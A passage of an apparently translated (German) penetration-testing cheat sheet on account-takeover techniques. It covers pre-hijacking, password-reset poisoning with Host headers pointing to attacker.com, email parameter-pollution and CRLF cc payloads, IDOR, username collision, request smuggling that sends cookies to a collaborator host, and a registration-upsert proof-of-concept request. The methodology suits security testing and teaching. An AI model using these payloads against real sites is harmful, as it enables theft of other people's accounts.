def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Try racing verification: submit the same valid OTP simultaneously in two sessions; sometimes one session becomes a verified attacker account while the victim flow also succeeds.
- Also test Host header poisoning on verification links (same as reset poisoning below) to leak or complete verification on attacker controlled host.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (bevor das Opfer sich registriert)

Eine mächtige Klasse von Problemen tritt auf, wenn ein Angreifer Aktionen an der E‑Mail des Opfers durchführt, bevor dieses sein Konto erstellt, und später wieder Zugriff gewinnt.

Wichtige Techniken zum Testen (an die Abläufe des Ziels anpassen):

- Classic–Federated Merge
- Angreifer: registriert ein klassisches Konto mit der E‑Mail des Opfers und setzt ein Passwort
- Opfer: meldet sich später mit SSO an (gleiche E‑Mail)
- Unsichere Merges können dazu führen, dass beide Parteien eingeloggt bleiben oder der Zugriff des Angreifers wiederhergestellt wird
- Unexpired Session Identifier
- Angreifer: erstellt ein Konto und hält eine langlebige Session (nicht ausloggen)
- Opfer: stellt das Passwort wieder her/legt ein Passwort fest und nutzt das Konto
- Prüfe, ob alte Sessions nach einem Reset oder der Aktivierung von MFA weiterhin gültig bleiben
- Trojan Identifier
- Angreifer: fügt dem vorerstellten Konto einen sekundären Identifier hinzu (Telefon, zusätzliche E‑Mail, oder verknüpft den IdP des Angreifers)
- Opfer: setzt das Passwort zurück; Angreifer nutzt später den trojan identifier, um zurückzusetzen/anzumelden
- Unexpired Email Change
- Angreifer: initiiert eine E‑Mail‑Änderung zur Angreifer‑E‑Mail und hält die Bestätigung zurück
- Opfer: stellt das Konto wieder her und beginnt es zu benutzen
- Angreifer: schließt später die ausstehende E‑Mail‑Änderung ab, um das Konto zu stehlen
- Non‑Verifying IdP
- Angreifer: verwendet einen IdP, der die E‑Mail‑Eigentümerschaft nicht verifiziert, um `victim@…` zu behaupten
- Opfer: registriert sich über den klassischen Weg
- Service merged anhand der E‑Mail, ohne `email_verified` zu prüfen oder eine lokale Verifizierung durchzuführen

Praktische Tipps

- Harvest flows und Endpunkte aus Web-/Mobile‑Bundles. Suche nach classic signup, SSO linking, email/phone change und password reset Endpunkten.
- Erstelle realistische Automation, um Sessions am Leben zu halten, während du andere Flows durchspielst.
- Für SSO‑Tests: stelle einen Test‑OIDC‑Provider bereit und gib Tokens mit `email`‑Claims für die Opferadresse und `email_verified=false` aus, um zu prüfen, ob der RP unverified IdPs vertraut.
- Nach jedem password reset oder jeder email‑Änderung überprüfe, dass:
- alle anderen Sessions und Tokens invalidiert werden,
- ausstehende email/phone‑Änderungen storniert werden,
- zuvor verknüpfte IdPs/E‑Mails/Telefonnummern erneut verifiziert werden.

Hinweis: Ausführliche Methodik und Fallstudien zu diesen Techniken sind in Microsofts pre‑hijacking‑Forschung dokumentiert (siehe Referenzen am Ende).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Fordere einen password reset für deine E‑Mail‑Adresse an
2. Klicke auf den password reset‑Link
3. Ändere das Passwort nicht
4. Klicke auf beliebige Drittanbieter‑Websites (z. B. Facebook, Twitter)
5. Fange die Anfrage im Burp Suite Proxy ab
6. Prüfe, ob der Referer‑Header ein password reset‑Token leak enthält.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Fange die password reset‑Anfrage in Burp Suite ab
2. Füge die folgenden Header in Burp Suite hinzu oder bearbeite sie: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Leite die Anfrage mit dem modifizierten Header weiter\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Suche nach einer password reset‑URL, die auf dem _host header_ basiert, z. B.: `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR bei API-Parametern

1. Der Angreifer muss sich mit seinem Account anmelden und zur Funktion Passwort ändern gehen.
2. Starte Burp Suite und aktiviere Intercept für die Anfrage
3. Sende sie zum Repeater-Tab und bearbeite die Parameter : User ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Schwaches Passwort-Reset-Token

Das Passwort-Reset-Token sollte bei jeder Anforderung zufällig generiert und eindeutig sein.
Versuche zu bestimmen, ob das Token abläuft oder ob es immer gleich ist; in einigen Fällen ist der Generierungsalgorithmus schwach und kann erraten werden. Folgende Variablen könnten vom Algorithmus verwendet werden.

• Timestamp
• UserID
• Email of User
• Firstname and Lastname
• Date of Birth
• Cryptography
• Number only
• Small token sequence ( characters between [A-Z,a-z,0-9])
• Token reuse
• Token expiration date

Leaking Password Reset Token

1. Trigger a password reset request using the API/UI for a specific email e.g: test@mail.com
2. Inspect the server response and check for resetToken
3. Then use the token in an URL like https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Passwort-Reset durch Username-Kollision

1. Registriere dich im System mit einem Benutzernamen, der identisch zum Benutzernamen des Opfers ist, aber mit Leerzeichen vor und/oder nach dem Benutzernamen eingefügt. z. B.: "admin "
2. Fordere ein Passwort-Reset für deinen bösartigen Benutzernamen an.
3. Nutze das an deine E-Mail gesendete Token und setze das Passwort des Opfers zurück.
4. Melde dich mit dem neuen Passwort beim Konto des Opfers an.

Die Plattform CTFd war für diesen Angriff verwundbar.
Siehe: CVE-2020-7245

Account-Übernahme via Cross Site Scripting

1. Finde ein XSS in der Anwendung oder auf einer Subdomain, wenn die Cookies auf die übergeordnete Domain gesetzt sind: *.domain.com
2. Leak the current sessions cookie
3. Authenticate as the user using the cookie

Account-Übernahme via HTTP Request Smuggling

1. Verwende smuggler um den Typ des HTTP Request Smuggling zu erkennen (CL, TE, CL.TE)
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. Erzeuge eine Anfrage, die den POST / HTTP/1.1 mit den folgenden Daten überschreibt:
   GET http://something.burpcollaborator.net HTTP/1.1 X: mit dem Ziel, die Opfer per Open-Redirect zu burpcollab zu leiten und ihre Cookies zu stehlen\
3. Die finale Anfrage könnte wie folgt aussehen

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone berichtet, dass dieser Bug ausgenutzt wurde\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

Account Takeover via CSRF

1. Erstelle ein Payload für CSRF, z. B.: “HTML form with auto submit for a password change”
2. Sende das Payload

Account Takeover via JWT

JSON Web Token kann zur Authentifizierung eines Benutzers verwendet werden.

• JWT mit einer anderen User ID / Email bearbeiten
• Auf schwache JWT-Signatur prüfen

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset (Upsert on Existing Email)

Einige signup handlers führen ein upsert durch, wenn die angegebene E-Mail bereits existiert. Akzeptiert der Endpoint einen minimalen Body mit einer E-Mail und einem Passwort und erzwingt keine Besitzverifikation, überschreibt das Senden der E-Mail des Opfers dessen Passwort vor Authentifizierung.

• Discovery: Endpunktnamen aus gebündeltem JS (oder mobilem App-Traffic) sammeln, dann Basis-Pfade wie /parents/application/v4/admin/FUZZ mit ffuf/dirsearch fuzz’en.
• Method hints: Ein GET, das Nachrichten wie “Only POST request is allowed.” zurückgibt, deutet oft auf das richtige Verb und darauf hin, dass ein JSON-Body erwartet wird.
• Minimaler Body, in freier Wildbahn beobachtet:

{"email":"victim@example.com","password":"New@12345"}

Beispiel PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

Auswirkung: Full Account Takeover (ATO) ohne Reset-Token, OTP oder E-Mail-Verifizierung.

Referenzen

• How I Found a Critical Password Reset Bug (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

• Überprüfen Sie die Abonnementpläne!
• Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
• Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.